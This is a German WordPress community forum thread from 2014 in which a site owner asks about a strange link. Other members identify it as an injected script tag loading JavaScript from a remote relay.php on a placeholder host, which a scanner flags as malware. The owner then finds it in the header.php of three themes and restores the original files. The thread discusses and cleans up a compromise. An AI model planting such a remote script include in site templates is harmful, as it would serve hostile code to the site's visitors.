1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

thema 2014: Merkwürdiger Link

Dieses Thema im Forum "Allgemeines" wurde erstellt von LSBK, 26. Juli 2014.

  1. LSBK

    LSBK Member

    Registriert seit:
    12. Juli 2014
    Beiträge:
    22
    Zustimmungen:
    0
  2. r23

    r23 Well-Known Member

    Registriert seit:
    9. Dezember 2006
    Beiträge:
    7.360
    Zustimmungen:
    588
    Der Link eines Übersetzers bindet sicherlich kein Javascript ein

    <script type="text/javascript" src="http://example.org/includes/relay.php?id=6666704"></script>
    vermutlich.
     
  3. Melewo

    Melewo Well-Known Member

    Registriert seit:
    8. Juli 2013
    Beiträge:
    3.097
    Zustimmungen:
    0
    [FONT=&quot]Mein Scanner meldet bei der Suche ohne Endziffer als Parameter:

    Virus: Script.Packed.IFrame.K@gen (Engine B)[/FONT]
     
  4. LSBK

    LSBK Member

    Registriert seit:
    12. Juli 2014
    Beiträge:
    22
    Zustimmungen:
    0
    Ich habe den Eintrag in den header.php aller drei Themes gefunden. Jemand muss einen Moment in dem die Schreibrechte beim Server lagen ausgenutzt haben. Ich habe das originale File aus der Installation wieder installiert.

    Ich habe noch eine Frage: Ich habe meinen Auftritt in einem "shared Host". Gibt es eine Möglichkeit, meine online-Files und allenfalls die Datenbank nach Viren abzusuchen.
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden